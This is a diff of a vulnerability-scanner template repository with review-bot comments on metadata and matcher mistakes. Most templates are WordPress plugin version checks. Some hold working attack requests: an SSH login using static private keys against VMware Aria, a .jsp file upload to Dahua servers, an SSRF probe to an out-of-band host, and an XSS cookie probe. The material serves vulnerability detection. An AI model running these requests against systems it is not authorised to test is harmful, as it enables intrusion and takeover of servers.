@@ -32,10 +44,13 @@ requests: - 'Login' - 'Password' condition: and + - type: word part: header words: - filename="sysLogs.txt" + - type: status status: - 200 +# digest: 4b0a00483046022100c105baf81eece25876bb160c12d4020488d8704a9471c6741843cdf519aeb7cf022100ea687a1bbdac5c1f579a5a45a454b6fb66e7032e80bbffd0b05f0fa19b0b165c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-35416.yaml b/poc/cve/CVE-2022-35416.yaml index d7f5f121af..d782414f0d 100644 --- a/poc/cve/CVE-2022-35416.yaml +++ b/poc/cve/CVE-2022-35416.yaml @@ -1,13 +1,10 @@ id: CVE-2022-35416 - info: - name: H3C SSL VPN <=2022-07-10 - Cross-Site Scripting + name: H3C SSL VPN through 2022-07-10 - Cookie Based XSS author: 0x240x23elu severity: medium description: | - H3C SSL VPN 2022-07-10 and prior contains a cookie-based cross-site scripting vulnerability in wnm/login/login.json svpnlang. - remediation: | - Apply the latest security patch or upgrade to a version of H3C SSL VPN that is not affected by this vulnerability. + H3C SSL VPN through 2022-07-10 allows wnm/login/login.json svpnlang cookie XSS. reference: - https://github.com/advisories/GHSA-9x76-78gc-r3m9 - https://github.com/Docker-droid/H3C_SSL_VPN_XSS 
@@ -17,37 +14,26 @@ info: cvss-score: 6.1 cve-id: CVE-2022-35416 cwe-id: CWE-79 - epss-score: 0.00099 - epss-percentile: 0.4077 - cpe: cpe:2.3:a:h3c:ssl_vpn:*:*:*:*:*:*:*:* metadata: - verified: true - max-request: 1 - vendor: h3c - product: ssl_vpn shodan-query: http.html_hash:510586239 + verified: "true" tags: cve,cve2022,xss,vpn,h3c - -http: +requests: - raw: - | GET /wnm/login/login.json HTTP/1.1 Host: {{Hostname}} Cookie: svpnlang= - matchers-condition: and matchers: - type: word part: body words: - "" - - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 4b0a00483046022100a4f986c5d3f3b0e3b30e1a33032cdc39383aabd9d733304df6780d16624318d2022100bb462e408b23eb355059a372a2f16313b88aa396c31a5e3fb8aa45e6f7d68196:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2023-23752.yaml b/poc/cve/CVE-2023-23752.yaml index 7d7b738f04..20f529a757 100644 --- a/poc/cve/CVE-2023-23752.yaml +++ b/poc/cve/CVE-2023-23752.yaml 
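Review bot: As shown in this hunk, the request in CVE-2022-35416.yaml sends `Cookie: svpnlang=` with no value, and the only entry in the body matcher is `""`. If that is the file's real content rather than markup lost when the page was rendered, the body matcher is satisfied by every response and any `200` reply with `text/html` from `/wnm/login/login.json` is reported as XSS. The cookie should carry a unique marker value and the body matcher should look for that same marker reflected unencoded. These are unchanged context lines, so the problem predates this commit, but the sync leaves it in place.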
@@ -1,35 +1,57 @@ id: CVE-2023-23752 info: - name: Joomla Webservice Endpoint access control - author: thecyberneh - description: An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints. - severity: high - tags: cves + name: Joomla! Webservice - Password Disclosure + author: badboycxcc,Sascha Brendel + severity: medium + description: | + An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints. + remediation: Upgrade to Joomla! version 4.2.8 or later. + reference: + - https://unsafe.sh/go-149780.html + - https://twitter.com/gov_hack/status/1626471960141238272/photo/1 + - https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-23552 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2023-23752 + epss-score: 0.75089 + epss-percentile: 0.97845 + cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: joomla + product: joomla\! + shodan-query: html:"Joomla! 
- Open Source Content Management" + tags: cve,cve2023,joomla -requests: +http: - method: GET path: - - "{{BaseURL}}/api/index.php/v1/config/application?public=true" + - '{{BaseURL}}/api/index.php/v1/config/application?public=true' + - '{{BaseURL}}/api/v1/config/application?public=true' + stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - - "password" + - '"links":' + - '"attributes":' + condition: and - type: word - part: body - words: - - "application" - - - type: word - part: body + part: header words: - - "attributes" + - 'application/json' + - 'application/vnd.api+json' + condition: or - type: status status: - 200 +# digest: 4a0a004730450221008f759f564d7a456a2b10a0654305e2feacd40022c767644dc6dd29656cfd6b9f0220632bcf84c3981822a12d002f9dfa81a728ea2a70e37ea053434a8666554fd72f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2023-34039.yaml b/poc/cve/CVE-2023-34039.yaml new file mode 100644 index 0000000000..c83d8c7995 --- /dev/null +++ b/poc/cve/CVE-2023-34039.yaml 
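Review bot: The added NVD reference in CVE-2023-23752.yaml points at a different CVE: `https://nvd.nist.gov/vuln/detail/CVE-2023-23552`, while the template id and `cve-id` are CVE-2023-23752; it should read `- https://nvd.nist.gov/vuln/detail/CVE-2023-23752`. The new name says "Password Disclosure", but the new matchers no longer look for `password` in the body, only for `"links":` and `"attributes":` with a JSON content type. A hit therefore shows that the config endpoint answers without authentication, not that a credential was returned, and the name or description should say so. The added `classification` block also has no `cwe-id`.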
@@ -0,0 +1,67 @@ +id: CVE-2023-34039 + +info: + name: VMWare Aria Operations - Remote Code Execution + author: tarunKoyalwar + severity: critical + description: | + VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039) + Version: All versions from 6.0 to 6.10 + impact: | + Successful exploitation of this vulnerability can lead to remote code execution or a complete system crash. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix this vulnerability. + reference: + - https://github.com/sinsinology/CVE-2023-34039.git + - https://nvd.nist.gov/vuln/detail/CVE-2023-34039 + - http://packetstormsecurity.com/files/174452/VMWare-Aria-Operations-For-Networks-Remote-Code-Execution.html + - http://packetstormsecurity.com/files/175320/VMWare-Aria-Operations-For-Networks-SSH-Private-Key-Exposure.html + - https://www.vmware.com/security/advisories/VMSA-2023-0018.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-34039 + cwe-id: CWE-327 + epss-score: 0.9013 + epss-percentile: 0.98721 + cpe: cpe:2.3:a:vmware:aria_operations_for_networks:*:*:*:*:*:*:*:* + metadata: + verified: true + vendor: vmware + product: aria_operations_for_networks + tags: js,packetstorm,cve,cve2019,vmware,aria,rce,fuzz,vrealize +variables: + keysDir: "helpers/payloads/cve-2023-34039-keys" # load all private keys from this directory + +javascript: + # init field can be used to make any preperations before the actual exploit + # here we are reading all private keys from helpers folder and storing them in a list + - init: | + let m = require('nuclei/fs'); + let privatekeys = m.ReadFilesFromDir(keysDir) + updatePayload('keys',privatekeys) + # check if port is open before bruteforcing + pre-condition: | + isPortOpen(Host,Port) + # actual exploit + code: | + let m = require('nuclei/ssh') + let c = m.SSHClient() + c.ConnectWithKey(Host,Port,'support@'+Host,key) 
// returns true if connection is successful + args: + Host: "{{Host}}" + Port: "22" + key: "{{keys}}" + keysDir: "{{keysDir}}" + payloads: + # 'keys' will be updated by actual private keys after init is executed + keys: + - dummy1 + - dummy2 + threads: 10 + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - success && response +# digest: 4a0a0047304502202b98e75ed8b7179fce923039e93baf0da9359ae4bd9edd5f205768ed70bbdd2d022100fdd378ca41e7a2cb85cf3c74f02fc2418502e6aac28860f13d8a20aaa60ce903:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2023-35047.yaml b/poc/cve/CVE-2023-35047.yaml index bee45f7498..a8e1f1a930 100644 --- a/poc/cve/CVE-2023-35047.yaml +++ b/poc/cve/CVE-2023-35047.yaml @@ -53,4 +53,4 @@ http: - type: dsl dsl: - - compare_versions(version, '<= 1.3.6') \ No newline at end of file + - compare_versions(version, '<= 1.3.6') diff --git a/poc/cve/CVE-2023-3836.yaml b/poc/cve/CVE-2023-3836.yaml index c7afb0444b..d9ab862ef2 100644 --- a/poc/cve/CVE-2023-3836.yaml +++ b/poc/cve/CVE-2023-3836.yaml 
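Review bot: The `tags` line in the new CVE-2023-34039.yaml carries `cve2019` although the id and `cve-id` are CVE-2023-34039, so tag-based selection or reporting by `cve2023` will miss this template; it should be `tags: js,packetstorm,cve,cve2023,vmware,aria,rce,fuzz,vrealize`. The template performs SSH login attempts with a bundled key set at `threads: 10`, yet unlike the file-upload template in this commit it has no `intrusive` tag, so runs that exclude intrusive checks will still execute it; consider adding the tag. The `metadata` block has no `max-request`, and the comment above `init` misspells "preparations".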
@@ -1,50 +1,68 @@ id: CVE-2023-3836 info: - name: 大华-WPMS-upload-addimgico - author: hufei - severity: high + name: Dahua Smart Park Management - Arbitrary File Upload + author: HuTa0 + severity: critical description: | - 大华 智慧园区综合管理平台 devicePoint_addImgIco 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限 + Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?. + remediation: | + Apply the latest security patch or update provided by the vendor to fix the arbitrary file upload vulnerability. reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/tree/main/docs/wiki/iot/%E5%A4%A7%E5%8D%8E + - https://github.com/qiuhuihk/cve/blob/main/upload.md + - https://nvd.nist.gov/vuln/detail/CVE-2023-3836 + - https://vuldb.com/?ctiid.235162 + - https://vuldb.com/?id.235162 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-3836 + cwe-id: CWE-434 + epss-score: 0.03083 + epss-percentile: 0.89967 + cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:* metadata: - max-request: 1 - fofa-query: app="大华-智慧园区综合管理平台" - hunter-query: app.name="Dahua 大华 智慧园区管理平台" verified: true + max-request: 2 + vendor: dahuasecurity + product: smart_parking_management + shodan-query: html:"/WPMS/asset" + zoomeye-query: /WPMS/asset + tags: cve,cve2023,dahua,fileupload,intrusive,rce +variables: + random_str: "{{rand_base(6)}}" + match_str: "{{md5(random_str)}}" http: - raw: - | POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1 + Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT Host: {{Hostname}} - User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_8 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/11.8w0575.0 Mobile/69G115 Safari/533.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 177 - 
Content-Type: multipart/form-data; boundary=e00b34d08d13639f8b619829b04c1a29 - --e00b34d08d13639f8b619829b04c1a29 - Content-Disposition: form-data; name="upload"; filename="test.jsp" - Content-Type: image/gif - - {{randstr}} - --e00b34d08d13639f8b619829b04c1a29-- + --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT + Content-Disposition: form-data; name="upload"; filename="{{random_str}}.jsp" + Content-Type: application/octet-stream + Content-Transfer-Encoding: binary + {{match_str}} + --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT-- - | - GET /upload/emap/society_new/{{name}} HTTP/1.1 + GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1 Host: {{Hostname}} + matchers: + - type: dsl + dsl: + - "status_code_1 == 200 && status_code_2 == 200" + - "contains(body_2, '{{match_str}}')" + condition: and + extractors: - - type: json - name: name - json: - - ".data" + - type: regex + name: shell_filename internal: true - - matchers: - - type: word - words: - - '{{randstr}}' \ No newline at end of file + part: body_1 + regex: + - 'ico_res_(\w+)_on\.jsp' +# digest: 4b0a00483046022100f2fe66aae8a7930c251558f40e6a8761a1a2f08dc61ceb26fdb620340e407485022100b09958027468fc3a2c2e0713cd534f24ffcb47ccdbdc4fe72a231113cc9f634f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2024-1183.yaml b/poc/cve/CVE-2024-1183.yaml new file mode 100644 index 0000000000..06f1156ff3 --- /dev/null +++ b/poc/cve/CVE-2024-1183.yaml 
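Review bot: The new `description` in CVE-2023-3836.yaml never states the flaw: it describes the product and ends with `including/emap/devicePoint_addImgIco?.`, whereas the text it replaces said that the interface allows arbitrary file upload. Something like `Dahua Smart Park Management is vulnerable to arbitrary file upload via /emap/devicePoint_addImgIco, allowing an attacker to place files on the server.` would match the name and the CWE-434 classification. The check also leaves the uploaded `.jsp` on the target with no cleanup request, which a comment should point out so that operators remove the file after testing.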
@@ -0,0 +1,36 @@ +id: CVE-2024-1183 + +info: + name: Gradio - Server Side Request Forgery + author: DhiyaneshDK + severity: medium + description: | + An SSRF (Server-Side Request Forgery) vulnerability exists in the gradio-app/gradio repository, allowing attackers to scan and identify open ports within an internal network. By manipulating the 'file' parameter in a GET request, an attacker can discern the status of internal ports based on the presence of a 'Location' header or a 'File not allowed' error in the response. + reference: + - https://github.com/gradio-app/gradio/commit/2ad3d9e7ec6c8eeea59774265b44f11df7394bb4 + - https://huntr.com/bounties/103434f9-87d2-42ea-9907-194a3c25007c + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2024-1183 + cwe-id: CWE-601 + epss-score: 0.00061 + epss-percentile: 0.24702 + metadata: + verified: true + max-request: 1 + shodan-query: html:"__gradio_mode__" + tags: cve,cve2024,ssrf,oast,gradio + +http: + - raw: + - | + GET /file=http://oast.pro HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$' + part: header +# digest: 4a0a004730450221008fa9c24b03fedb13e37837ad2730bc20d6d973ad45a2d74dd82193fb651172c5022057ad36fe5c2c8f0f555f7106c808470d5cfc40e96a168c822c4cc96f1183df15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2024-32651.yaml b/poc/cve/CVE-2024-32651.yaml new file mode 100644 index 0000000000..1a2deb2d94 --- /dev/null +++ b/poc/cve/CVE-2024-32651.yaml 
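Review bot: The classification in CVE-2024-1183.yaml disagrees with what the template claims: the name and tags say SSRF, but `cwe-id` is `CWE-601` (open redirect), and the only matcher is a regex on a `Location` header naming `oast.pro`. A `Location` header shows that the server answered with a redirect, not that it made an outbound request, and despite the `oast` tag no out-of-band interaction is checked. Either set `cwe-id: CWE-918` and confirm the finding through an observed callback, or keep CWE-601 and rename the template to what it actually detects. The matcher also has no status condition, so any response type carrying that header matches.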
@@ -0,0 +1,57 @@ +id: CVE-2024-32651 + +info: + name: Change Detection - Server Side Template Injection + author: edoardottt + severity: critical + description: | + A Server Side Template Injection in changedetection.io caused by usage of unsafe functions of Jinja2 allows Remote Command Execution on the server host. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-32651 + - https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-4r7v-whpg-8rx3 + - https://github.com/dgtlmoon/changedetection.io/releases/tag/0.45.21 + - https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2024-32651 + cwe-id: CWE-1336 + epss-score: 0.00045 + epss-percentile: 0.14322 + metadata: + verified: true + max-request: 1 + shodan-query: html:"Change Detection" + tags: cve,cve2024,changedetection,ssti,rce,passive + +http: + - method: GET + path: + - "{{RootURL}}/" + + redirects: true + max-redirects: 2 + + extractors: + - type: xpath + name: version + internal: true + xpath: + - "//*[@id=\"right-sticky\"]" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "Change Detection" + condition: and + + - type: dsl + dsl: + - compare_versions(version, '<= 0.45.20') +# digest: 490a004630440220166f3ac3c6c4657641c4499aa0d8cd1096190ee1a19bb4497770c30fac5558da0220174976fb80906ac6496cdb1e657106b3c93cdde5f8980ed3ab7c0bcf2de63113:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2024-35668.yaml b/poc/cve/CVE-2024-35668.yaml new file mode 100644 index 0000000000..ee7ac8de51 --- /dev/null +++ b/poc/cve/CVE-2024-35668.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-35668 + +info: + name: > + Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue <= 3.1.77 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 3.1.77 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/80c90bc0-ca24-4c7f-93b9-a9d0804ee459?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-35668 + metadata: + fofa-query: "wp-content/plugins/mailin/" + google-query: inurl:"/wp-content/plugins/mailin/" + shodan-query: 'vuln:CVE-2024-35668' + tags: cve,wordpress,wp-plugin,mailin,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mailin/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mailin" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.1.77') \ No newline at end of file diff --git a/poc/cve/CVE-2024-3668.yaml b/poc/cve/CVE-2024-3668.yaml new file mode 100644 index 0000000000..62ee003cba --- /dev/null +++ b/poc/cve/CVE-2024-3668.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-3668 + +info: + name: > + PowerPack Pro for Elementor <= 2.10.17 - Authenticated (Contributor+) Privilege Escalation + author: topscoder + severity: low + description: > + The PowerPack Pro for Elementor plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 2.10.17. This is due to the plugin not restricting low privileged users from setting a default role for a registration form. This makes it possible for authenticated attackers, with contributor-level access and above, to create a registration form with administrator set as the default role and then register as an administrator. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/249ccc77-0daf-41bc-b5c5-991bf17d645d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-3668 + metadata: + fofa-query: "wp-content/plugins/powerpack-elements/" + google-query: inurl:"/wp-content/plugins/powerpack-elements/" + shodan-query: 'vuln:CVE-2024-3668' + tags: cve,wordpress,wp-plugin,powerpack-elements,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/powerpack-elements/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "powerpack-elements" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.10.17') \ No newline at end of file diff --git a/poc/cve/CVE-2024-4468.yaml b/poc/cve/CVE-2024-4468.yaml new file mode 100644 index 0000000000..cc7669e382 --- /dev/null +++ b/poc/cve/CVE-2024-4468.yaml 
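Review bot: `severity: low` and the `low` tag in CVE-2024-3668.yaml contradict the classification a few lines below: the CVSS vector ends in `C:H/I:H/A:H` with `cvss-score: 8.8`, and the description is privilege escalation to administrator. Scans filtered by severity will drop or under-rank this finding. It should read `severity: high`, with the last tag changed to match. CVE-2024-4468.yaml and CVE-2024-4661.yaml show the same pattern with `severity: low` against a 4.3 score, which is medium.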
@@ -0,0 +1,59 @@
+id: CVE-2024-4468
+
+info:
+ name: >
+ Salon booking system <= 9.9 - Missing Authorization
+ author: topscoder
+ severity: low
+ description: >
+ The Salon booking system plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on several functions hooked into admin_init in all versions up to, and including, 9.9. This makes it possible for authenticated attackers with subscriber access or higher to modify plugin settings and view discount codes intended for other users.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/8b73f864-68b5-4ba8-93a3-37f2564cc240?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-4468
+ metadata:
+ fofa-query: "wp-content/plugins/salon-booking-system/"
+ google-query: inurl:"/wp-content/plugins/salon-booking-system/"
+ shodan-query: 'vuln:CVE-2024-4468'
+ tags: cve,wordpress,wp-plugin,salon-booking-system,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/salon-booking-system/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "salon-booking-system"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 9.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-4661.yaml b/poc/cve/CVE-2024-4661.yaml
new file mode 100644
index 0000000000..2560456a2a
--- /dev/null
+++ b/poc/cve/CVE-2024-4661.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-4661
+
+info:
+ name: >
+ WP Reset <= 2.02 - Missing Authorization to License Key Modification
+ author: topscoder
+ severity: low
+ description: >
+ The WP Reset plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_ajax function in all versions up to, and including, 2.02. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify the value fo the 'License Key' field for the 'Activate Pro License' setting.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/0d2dc86e-f937-429f-9baa-0eb0a8715513?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-4661
+ metadata:
+ fofa-query: "wp-content/plugins/wp-reset/"
+ google-query: inurl:"/wp-content/plugins/wp-reset/"
+ shodan-query: 'vuln:CVE-2024-4661'
+ tags: cve,wordpress,wp-plugin,wp-reset,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-reset/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-reset"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.01')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-5087.yaml b/poc/cve/CVE-2024-5087.yaml
new file mode 100644
index 0000000000..c7cb9e4238
--- /dev/null
+++ b/poc/cve/CVE-2024-5087.yaml
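Review bot: The version bound in the `dsl` matcher is `'<= 2.01'`, but the name and the description of this template both give the affected range as up to and including 2.02, so a site whose readme reports 2.02 is not flagged. The line should read `- compare_versions(version, '<= 2.02')`. If 2.01 is the intended bound, the name and description need to change instead so the three agree.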
@@ -0,0 +1,59 @@
+id: CVE-2024-5087
+
+info:
+ name: >
+ Minimal Coming Soon – Coming Soon Page <= 2.38 - Missing Authorization to Limited Settings Change
+ author: topscoder
+ severity: low
+ description: >
+ The Minimal Coming Soon – Coming Soon Page plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the validate_ajax, deactivate_ajax, and save_ajax functions in all versions up to, and including, 2.38. This makes it possible for authenticated attackers, with Subscriber-level access and above, to edit the license key, which could disable features of the plugin.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/affdaf63-2098-4ad6-b15b-990d1941fecb?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
+ cvss-score: 6.3
+ cve-id: CVE-2024-5087
+ metadata:
+ fofa-query: "wp-content/plugins/minimal-coming-soon-maintenance-mode/"
+ google-query: inurl:"/wp-content/plugins/minimal-coming-soon-maintenance-mode/"
+ shodan-query: 'vuln:CVE-2024-5087'
+ tags: cve,wordpress,wp-plugin,minimal-coming-soon-maintenance-mode,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/minimal-coming-soon-maintenance-mode/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "minimal-coming-soon-maintenance-mode"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.38')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-5091.yaml b/poc/cve/CVE-2024-5091.yaml
new file mode 100644
index 0000000000..637c9061bd
--- /dev/null
+++ b/poc/cve/CVE-2024-5091.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-5091
+
+info:
+ name: >
+ SKT Addons for Elementor <= 2.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Age Gate and Creative Slider Widgets
+ author: topscoder
+ severity: low
+ description: >
+ The SKT Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Age Gate and Creative Slider widgets in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/dc8d63ee-4929-4940-bc6a-931524e20272?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L
+ cvss-score: 7.4
+ cve-id: CVE-2024-5091
+ metadata:
+ fofa-query: "wp-content/plugins/skt-addons-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/skt-addons-for-elementor/"
+ shodan-query: 'vuln:CVE-2024-5091'
+ tags: cve,wordpress,wp-plugin,skt-addons-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/skt-addons-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "skt-addons-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-5613.yaml b/poc/cve/CVE-2024-5613.yaml
new file mode 100644
index 0000000000..56b00e43ae
--- /dev/null
+++ b/poc/cve/CVE-2024-5613.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-5613
+
+info:
+ name: >
+ Formula <= 0.5.1 - Reflected Cross-Site Scripting via quality_customizer_notify_dismiss_action
+ author: topscoder
+ severity: medium
+ description: >
+ The Formula theme for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘id’ parameter in the 'quality_customizer_notify_dismiss_action' AJAX action in all versions up to, and including, 0.5.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/bf391432-d569-4458-947f-fe4a2ebcf8f1?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-5613
+ metadata:
+ fofa-query: "wp-content/themes/formula/"
+ google-query: inurl:"/wp-content/themes/formula/"
